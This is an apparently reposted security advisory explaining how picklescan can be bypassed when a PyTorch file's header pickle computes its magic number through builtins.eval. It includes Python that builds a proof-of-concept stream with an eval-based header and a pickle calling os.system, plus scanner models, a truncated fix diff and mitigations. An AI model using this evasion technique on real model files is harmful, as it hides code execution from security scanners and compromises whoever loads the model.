DEV Community

CVE Reports

Posted on • Originally published at cvereports.com

GHSA-97F8-7CMV-76J2: The Magician's Trick: Bypassing Picklescan with Dynamic Eval


Vulnerability ID: GHSA-97F8-7CMV-76J2
CVSS Score: 7.5
Published: 2026-02-18

A logic flaw in the Picklescan security tool allows attackers to bypass malware detection in PyTorch models. Picklescan checks that the header pickle of a PyTorch file yields the expected magic number; if that header is built from pickle opcodes that compute the number at load time instead of storing it as a constant, the check fails with an InvalidMagicError and the scanner stops, so malicious payloads located later in the file stream are never examined.

TL;DR

Picklescan, a tool for detecting malicious AI models, can be blinded by a simple trick. If the PyTorch magic number is produced dynamically (for example by a header pickle that calls eval on a string) rather than stored as a literal, Picklescan's magic-number check raises an error and scanning stops; the file is reported as malformed, not as dangerous. torch.load, by contrast, unpickles the header, obtains the expected value and goes on to load the payload behind it, which is where the hidden malware runs.


⚠️ Exploit Status: POC
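To make the failure mode concrete, the following is an added, self-contained Python model of the two control flows described above. It is example code written for this page, not picklescan's implementation or PyTorch's: the simplified legacy stream layout, `get_magic_number`, `scan_pytorch_vulnerable` and `scan_pytorch_fixed` are assumptions that mirror the behaviour the advisory describes. The streams are constructed inline: one with a literal magic number, and one whose header pickle computes the magic number by reducing `builtins.eval` over the harmless expression `"0x1950a86a20f9469cfc6c"`, followed by a stand-in payload referencing `os.system` that is never unpickled. It also goes one step beyond the advisory by handling the protocol-4 `STACK_GLOBAL` form of the same trick.

```python
import io
import pickle
import pickletools

# The legacy (non-zip) torch.save layout starts with a pickle of this constant.
MAGIC_NUMBER = 0x1950A86A20F9469CFC6C
PROTOCOL_VERSION = 1001


class InvalidMagicError(Exception):
    """Raised when the first pickle does not yield a literal magic number."""


def split_pickles(data: bytes) -> list[bytes]:
    """Split back-to-back pickles at each STOP opcode (this toy stream holds no raw storage bytes)."""
    buf, parts = io.BytesIO(data), []
    while buf.tell() < len(data):
        start = buf.tell()
        for _ in pickletools.genops(buf):  # consumes exactly one pickle, STOP included
            pass
        parts.append(data[start:buf.tell()])
    return parts


def get_magic_number(header: bytes):
    """Model of the vulnerable check: only an integer constant in the header counts."""
    for opcode, arg, _ in pickletools.genops(header):
        if opcode.name in ("INT", "BININT", "BININT1", "BININT2", "LONG", "LONG1", "LONG4"):
            return arg
    return None  # the header computes its value at load time instead of storing it


def globals_in(pickled: bytes) -> list[tuple[str, str]]:
    """Every (module, name) the pickle would import: GLOBAL (proto <= 3) or STACK_GLOBAL (proto 4+)."""
    found, strings = [], []
    for opcode, arg, _ in pickletools.genops(pickled):
        if opcode.name == "GLOBAL":
            found.append(tuple(arg.split(" ", 1)))
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            found.append((strings[-2], strings[-1]))  # operands are the two most recent strings
        elif opcode.name in ("UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"):
            strings.append(arg)
    return found


def scan_pytorch_vulnerable(data: bytes) -> list[tuple[str, str]]:
    """Pre-fix flow (assumed): a non-literal magic number raises before any pickle is inspected."""
    header, *rest = split_pickles(data)
    magic = get_magic_number(header)
    if magic != MAGIC_NUMBER:
        raise InvalidMagicError(f"expected {MAGIC_NUMBER:#x}, got {magic!r}")
    return [g for part in rest for g in globals_in(part)]


def scan_pytorch_fixed(data: bytes) -> list[tuple[str, str]]:
    """Hardened flow (assumed): a mismatch is itself suspect, so scan the header for globals, then fail closed."""
    header, *rest = split_pickles(data)
    findings = []
    if get_magic_number(header) != MAGIC_NUMBER:
        findings.extend(globals_in(header))
        if not findings:
            raise InvalidMagicError("not a PyTorch stream and no code in the header")
    findings.extend(g for part in rest for g in globals_in(part))
    return findings


def loader_view(header: bytes):
    """What a permissive unpickler (torch.load's included) sees: the computed value, not the opcodes."""
    return pickle.loads(header)


def legacy_stream(header: bytes, payload: bytes) -> bytes:
    """Constructed, simplified legacy layout: magic, protocol version, sys_info, model pickle."""
    sys_info = {"protocol_version": PROTOCOL_VERSION, "little_endian": True}
    return header + pickle.dumps(PROTOCOL_VERSION, protocol=2) + pickle.dumps(sys_info, protocol=2) + payload


# Constructed headers. The benign one stores the constant (PROTO, LONG1, STOP) ...
BENIGN_HEADER = pickle.dumps(MAGIC_NUMBER, protocol=2)
# ... the dynamic one computes it with GLOBAL + REDUCE; the evaluated expression is just a hex literal.
DYNAMIC_HEADER = (
    b"\x80\x02"                                           # PROTO 2
    b"cbuiltins\neval\n"                                  # GLOBAL builtins.eval
    b"X\x16\x00\x00\x00" + f"{MAGIC_NUMBER:#x}".encode()  # BINUNICODE "0x1950a86a20f9469cfc6c"
    + b"\x85R."                                           # TUPLE1, REDUCE, STOP
)


class _DynamicMagic:
    """Same trick via __reduce__, so pickle itself emits STACK_GLOBAL at protocol 4."""

    def __reduce__(self):
        return (eval, (f"{MAGIC_NUMBER:#x}",))


def dynamic_header_proto4() -> bytes:
    return pickle.dumps(_DynamicMagic(), protocol=4)


# Constructed payloads, never unpickled here: a plain dict, and one that would call os.system("true").
BENIGN_PAYLOAD = pickle.dumps({"weight": [1.0, 2.0]}, protocol=2)
MALICIOUS_PAYLOAD = b"\x80\x02cos\nsystem\nX\x04\x00\x00\x00true\x85R."

BENIGN_STREAM = legacy_stream(BENIGN_HEADER, BENIGN_PAYLOAD)
MALICIOUS_STREAM = legacy_stream(DYNAMIC_HEADER, MALICIOUS_PAYLOAD)

if __name__ == "__main__":
    print("fixed scan of dynamic-header stream:", scan_pytorch_fixed(MALICIOUS_STREAM))
    print("permissive loader sees:", hex(loader_view(DYNAMIC_HEADER)))
```

Run against the malicious stream, the constant-only check returns None, so `scan_pytorch_vulnerable` raises before it ever reaches the `os.system` pickle, while `loader_view` still recovers the real magic number because a permissive unpickler simply executes the REDUCE. The fixed flow treats the mismatch as a reason to inspect the header and reports both `builtins.eval` and `os.system`; a stream that is merely not a PyTorch file (wrong magic, no globals anywhere in the header) still raises, so the scanner stays fail-closed.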

Technical Details

  • Attack Vector: Local / File-based
  • Impact: Remote Code Execution (RCE)
  • CWE: CWE-693: Protection Mechanism Failure
  • CVSS: 7.5 (High)
  • Component: picklescan.scanner.scan_pytorch
  • Detection: Bypassed via dynamic header generation

Affected Systems

  • picklescan <= 1.0.2 (fixed in 1.0.3)
  • Systems ingesting untrusted PyTorch models
  • MLOps pipelines relying on picklescan for validation

Code Analysis

Commit: b999763

Fix PyTorch magic number bypass by scanning header for globals

@@ -120,7 +120,13 @@
     magic = get_magic_number(data)
     if magic != MAGIC_NUMBER:
-        raise InvalidMagicError(magic, MAGIC_NUMBER, file_id)
+        # Check for dynamic magic number generation...
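Review bot: the added side of this hunk is cut off after the comment on its last line, so the new behaviour on `magic != MAGIC_NUMBER` is not visible: the header advertises six added lines (`-120,7 +120,13`) but only one is shown. The hunk should include the branch that follows the comment and make clear that a header with a wrong magic number and no globals still raises `InvalidMagicError` (or is reported) rather than falling through as a clean scan, since a mismatched magic must remain fail-closed; as shown, a reader cannot confirm that the original `raise` was retained on that path.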

Mitigation Strategies

  • Update picklescan to version 1.0.3 immediately.
  • Prefer Safetensors (.safetensors), which carries no executable pickle stream, over pickle-based formats (.pt, .pkl) for model storage.
  • Implement sandboxing (e.g., Docker, gVisor) when loading untrusted models, regardless of scan results.

Remediation Steps:

  1. Run pip install --upgrade picklescan.
  2. Rescan any PyTorch models ingested while a vulnerable version was in use (before the 1.0.3 fix in February 2026).
  3. Configure CI/CD pipelines to fail closed: a scanner error or exception (such as InvalidMagicError) must be treated as a failed scan, not as a clean result.

